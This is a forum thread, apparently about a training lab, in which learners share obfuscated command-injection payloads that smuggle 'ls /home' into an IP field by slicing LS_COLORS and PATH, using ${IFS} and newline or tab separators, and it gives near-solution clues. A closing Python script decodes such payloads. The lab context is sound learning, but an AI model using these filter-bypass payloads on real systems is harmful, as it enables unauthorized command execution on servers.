Hey. I’ve been stuck with this question: "Use what you learned in this section to find the name of the user in the ‘/home’ folder. What user did you find?"
I’ve tried some payloads like
127.0.0.1${LS_COLORS:10:1}${IFS}{${LS_COLORS:14:1}${LS_COLORS:38:1},$(tr '!-}' '"-~'<<<.gnld)},
127.0.0.1${LS_COLORS:10:1}${IFS}{${LS_COLORS:14:1}${LS_COLORS:38:1},${PATH:0:5},
etc
but none of them works. It just returns something like this
I updated my payload to 127.0.0.1${LS_COLORS:10:1}${LS_COLORS:14:1}${LS_COLORS:38:1}${IFS}${HOME:0:5}
127.0.0.1${LS_COLORS:10:1}${LS_COLORS:14:1}${LS_COLORS:38:1}${IFS}${HOME:0:1}${LS_COLORS:24:1}${LS_COLORS:39:1}${LS_COLORS:23:1}${LS_COLORS:152:1}
But this is what I get so far. I need help.
I know that you’re supposed to use the $PATH variable because it makes the /. I’m stuck here also.
I used ip=127.0.0.1${LS_COLORS}${IFS}${PATH:0:1}${HOME}. It translates to ip=127.0.0.1; /HOME but it’s not working for me. I feel like something is missing. What does yours translate to?
Hi, I finally figured it out!
No need to use ${} for letters in the command.
Use it only for slashes and ;.
For spaces, use the “space bypass technique” from the previous sections.
Hi, assuming that you have found the correct request and parameter to inject, follow the indications I posted earlier.
For the command itself, take a look at <<< and subshell syntax like &{}, and don’t forget encoding.
I am not getting “invalid input” in the responses for the above, but no luck finding the username, so I believe I am on the right path to solving it.
Can anyone give me a tip to solve it?
This one was annoying because it depends on you guessing 2 parts of the command correctly to get any results. For example, why would you intuit that the server would accept plaintext following the command to break the logic, especially when the segment you’re in details how to get arbitrary characters from bit shifting. Here’s a clue for those who are stuck: ip=127.0.0.1%0a${IFS}ls%09${PATH:0:1}home
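Several replies above ask what a payload “translates to” (the ${HOME} attempt, the tip to reserve ${} for slashes and ;, and the final clue). The script below is an added example, not code from the thread or from the lab, that decodes a payload the way bash would process it: URL decode, then brace expansion, then ${VAR:offset:length} slices, ${VAR}, ${IFS} and the tr character shift from the first post. The environment values are constructed: LS_COLORS is the stock Debian/Ubuntu dircolors default (which is why ${LS_COLORS:10:1} is ;, :14 is l and :38 is s), PATH is a typical system PATH and HOME is /var/www, the home of www-data on Debian. On a real target the values are whatever the web server process inherited, so verify an offset there (for example by injecting only ${LS_COLORS:10:1} and reading the response) before building on it. One thing the decoder makes visible: bash copies the text before and after a {a,b} group onto every alternative, so under this environment the first payload from the opening post becomes “127.0.0.1; ls, 127.0.0.1; /home,” rather than “127.0.0.1; ls /home”.

```python
"""Decode obfuscated command-injection payloads into the command bash would run.

Added example, not code from the thread or the lab. The environment below is
constructed: LS_COLORS is the Debian/Ubuntu dircolors default, PATH a typical
system PATH, HOME www-data's home. Real targets may differ; check offsets there.
"""
import re
from urllib.parse import unquote

CONSTRUCTED_ENV = {
    "LS_COLORS": (
        "rs=0:di=01;34:ln=01;36:mh=00:pi=40;33:so=01;35:do=01;35:"
        "bd=40;33;01:cd=40;33;01:or=40;31;01:mi=00:su=37;41:sg=30;43:"
        "ca=30;41:tw=30;42:ow=34;42:st=37;44:ex=01;32:"
    ),
    "PATH": "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
    "HOME": "/var/www",
    "IFS": " \t\n",
}


def _find_brace(word):
    """Locate the first unquoted {a,b} group: returns (open, close, alternatives)
    or None. '${' is parameter expansion, not brace expansion, and quoted text
    is skipped, which is how bash treats both."""
    i, n = 0, len(word)
    while i < n:
        c = word[i]
        if c in "'\"":                          # skip a quoted region
            j = word.find(c, i + 1)
            i = n if j < 0 else j + 1
            continue
        if c == "{" and (i == 0 or word[i - 1] != "$"):
            depth, alts, start, k = 0, [], i + 1, i
            while k < n:
                ch = word[k]
                if ch in "'\"":                 # quotes may hide , or }
                    j = word.find(ch, k + 1)
                    k = n if j < 0 else j
                elif ch == "{":
                    depth += 1
                elif ch == "}":
                    depth -= 1
                    if depth == 0:
                        alts.append(word[start:k])
                        if len(alts) > 1:       # a group needs a comma
                            return i, k, alts
                        break
                elif ch == "," and depth == 1:
                    alts.append(word[start:k])
                    start = k + 1
                k += 1
        i += 1
    return None


def brace_expand(word):
    """One level of bash brace expansion, keeping preamble and postscript:
    'pre{a,b}post' -> ['preapost', 'prebpost']. Results are expanded again so
    a later {x,y} in the same word is handled as well."""
    hit = _find_brace(word)
    if hit is None:
        return [word]
    o, c, alts = hit
    out = []
    for alt in alts:
        out.extend(brace_expand(word[:o] + alt + word[c + 1:]))
    return out


def _tr_shift(match):
    """$(tr 'A-B' 'C-D'<<<text): map each char of text from range A-B to C-D."""
    a, b, c, d, text = match.groups()
    src = "".join(chr(x) for x in range(ord(a), ord(b) + 1))
    dst = "".join(chr(x) for x in range(ord(c), ord(d) + 1))
    return text.translate(str.maketrans(src, dst))


TR_RE = re.compile(r"\$\(tr\s+'(.)-(.)'\s+'(.)-(.)'\s*<<<\s*([^)\s]+)\)")
SLICE_RE = re.compile(r"\$\{(\w+):(\d+):(\d+)\}")
VAR_RE = re.compile(r"\$\{(\w+)\}")


def expand(word, env):
    """Command substitution (the tr trick), then ${VAR:off:len}, then ${VAR}."""
    word = TR_RE.sub(_tr_shift, word)
    word = SLICE_RE.sub(
        lambda m: env.get(m.group(1), "")[int(m.group(2)):int(m.group(2)) + int(m.group(3))],
        word,
    )
    # unquoted ${IFS} is whitespace that word splitting swallows, so one space
    return VAR_RE.sub(lambda m: " " if m.group(1) == "IFS" else env.get(m.group(1), ""), word)


def decode(payload, env=CONSTRUCTED_ENV):
    """URL-decode a parameter value (%0a, %09, ...), brace-expand it, expand
    variables, and return the string the shell executes."""
    raw = unquote(payload)              # unquote, not unquote_plus: '+' is literal here
    return " ".join(expand(w, env) for w in brace_expand(raw))


if __name__ == "__main__":
    for p in ("127.0.0.1%0a${IFS}ls%09${PATH:0:1}home",
              "127.0.0.1${LS_COLORS:10:1}${IFS}{${LS_COLORS:14:1}${LS_COLORS:38:1},$(tr '!-}' '\"-~'<<<.gnld)},",
              "127.0.0.1${LS_COLORS}${IFS}${PATH:0:1}${HOME}"):
        print(repr(p), "->", repr(decode(p)))
```

Run it with python3 and paste your own parameter value into the list at the bottom; the repr output shows newlines and tabs explicitly, which matters for the %0a and %09 separators. Only ${…} forms are handled, so write ${HOME} rather than $HOME, and remember that the IFS, LS_COLORS and HOME values are the constructed ones above, not the target’s.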